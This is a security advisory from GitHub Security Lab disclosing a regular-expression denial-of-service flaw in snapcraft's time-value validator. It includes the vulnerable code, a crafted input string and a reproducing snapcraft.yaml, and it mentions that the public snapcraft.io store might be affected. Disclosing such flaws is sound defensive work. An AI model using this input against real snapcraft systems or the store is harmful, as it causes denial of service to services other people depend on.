Coordinated Disclosure Timeline
- 2024-11-04: Report filed on launchpad
- 2025-01-09: Asked for an update
- 2025-01-20: No response, so created a public pull request to fix the bug: https://github.com/canonical/snapcraft/pull/5210
Summary
A snap with a crafted yaml file can cause a denial of service in snapcraft.
Project
snapcraft
Tested Version
Details
ReDoS in _validate_time (GHSL-2024-323)
_validate_time uses a regex to check that time values in a snap’s yaml file are formatted correctly:
@pydantic.field_validator(
"start_timeout", "stop_timeout", "watchdog_timeout", "restart_delay"
)
@classmethod
def _validate_time(cls, timeval):
if not re.match(r"^[0-9]+(ns|us|ms|s|m)*$", timeval):
raise ValueError(f"{timeval!r} is not a valid time value")
return timeval
For example, 10s or 10ms are both valid times. But the regex has a ReDoS vulnerability, which means that it runs very slowly on invalid inputs like this:
0msmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsx
To reproduce the ReDoS with snapcraft, first create an empty snap by running this command:
snapcraft init
Then replace the contents of ./snap/snapcraft.yaml with this text:
name: GHSL-2024-323
base: core24
apps:
GHSL-2024-323:
command: /bin/echo kevwozere
restart-delay: 0msmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsmsx
Now run the following command and observe that it takes a long time to finish:
snapcraft
The running time increases exponentially with the length of the invalid string.
This vulnerability was discovered with the help of CodeQL’s Inefficient regular expression query.
Impact
This issue may lead to denial of service. We have only tested our PoC locally, but it may also be possible to trigger a denial of service on https://snapcraft.io/ by uploading a malicious snap.
Credit
This issue was discovered and reported by GHSL team member @kevinbackhouse (Kevin Backhouse).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2024-323 in any communication regarding this issue.